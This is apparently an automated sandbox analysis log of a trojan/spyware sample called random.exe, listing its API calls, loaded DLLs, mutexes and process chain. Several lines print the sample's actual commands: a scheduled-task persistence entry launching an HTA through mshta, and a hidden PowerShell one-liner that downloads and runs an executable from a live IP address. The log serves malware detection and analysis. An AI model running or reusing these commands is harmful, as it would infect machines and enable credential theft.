                            Source: random[1].exe2.18.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@30/116@4/7
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003837B5 GetLastError,FormatMessageW,0_2_003837B5
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003710BF AdjustTokenPrivileges,CloseHandle,0_2_003710BF
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003716C3
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003851CD
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0039A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0039A67C
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0038648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0038648E
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_003142A2
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1828:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03
                            Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Temp\huS4b5Vj8.htaJump to behavior
                            Source: random.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                            Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: 28f48f066a.exe, 00000014.00000003.2734571885.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2733992192.0000000005DA7000.00000004.00000800.00020000.00000000.sdmp, 28f48f066a.exe, 00000014.00000003.2763041038.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4586980498.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp, 0dd40f41c4.exe, 00000017.00000003.4587840789.0000000005AAD000.00000004.00000800.00020000.00000000.sdmp, tmp362B.tmp.21.dr, tmp13AB.tmp.21.dr, tmpDD37.tmp.21.dr, tmp139A.tmp.21.dr, tmpFDD1.tmp.21.dr, tmp3619.tmp.21.dr, tmpFDE1.tmp.21.dr, tmp362A.tmp.21.dr, tmp13BC.tmp.21.dr, tmp363B.tmp.21.dr, tmp13CC.tmp.21.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: random.exeVirustotal: Detection: 26%
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: unknownProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
                            Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f
                            Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f
                            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE "C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE "C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE"
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe "C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exe "C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe "C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe"
                            Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                            Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.htaJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE "C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE" Jump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE "C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe "C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exe "C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe "C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exe"
                            Source: C:\Users\user\Desktop\random.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\random.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
